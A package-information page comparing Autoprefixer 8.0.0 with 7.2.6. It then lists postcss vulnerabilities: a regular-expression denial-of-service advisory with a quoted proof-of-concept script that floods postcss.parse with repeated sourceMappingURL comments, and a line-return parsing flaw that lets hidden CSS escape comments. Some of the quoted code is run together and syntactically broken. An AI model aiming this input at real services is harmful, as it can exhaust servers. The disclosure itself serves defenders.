Autoprefixer 8.0.0 represents a notable update from version 7.2.6, primarily focusing on dependency upgrades. Both versions share core functionality: parsing CSS and adding vendor prefixes based on Can I Use data, ensuring cross-browser compatibility. Key differences lie in the updated dependencies, particularly browserslist which jumps from version 2.11.3 to version 3.0.0, and caniuse-lite, moving from version 1.0.30000805 to 1.0.30000808. These updates reflect the evolving landscape of browser support and CSS standards, meaning Autoprefixer 8.0.0 will handle a more current set of browser prefixes and CSS features.
For developers, this translates to improved compatibility with newer CSS syntax and more accurate prefixing for a wider audience. While the API and core usage remain consistent, utilizing version 8.0.0 ensures better support for modern CSS and a reduced risk of outdated or inaccurate prefixes. The unpacked size also increases slightly, but the benefits of updated browser support likely outweigh this minor increase for most projects. By keeping dependencies up to date, you ensure that your CSS remains future-proofed and compatible across a broader range of browsers, specifically those supported by the newest browserslist and caniuse-lite versions. Choosing the latest major version will allow developers to benefit from improvements and bug fixes included.
All the vulnerabilities related to the version 8.0.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.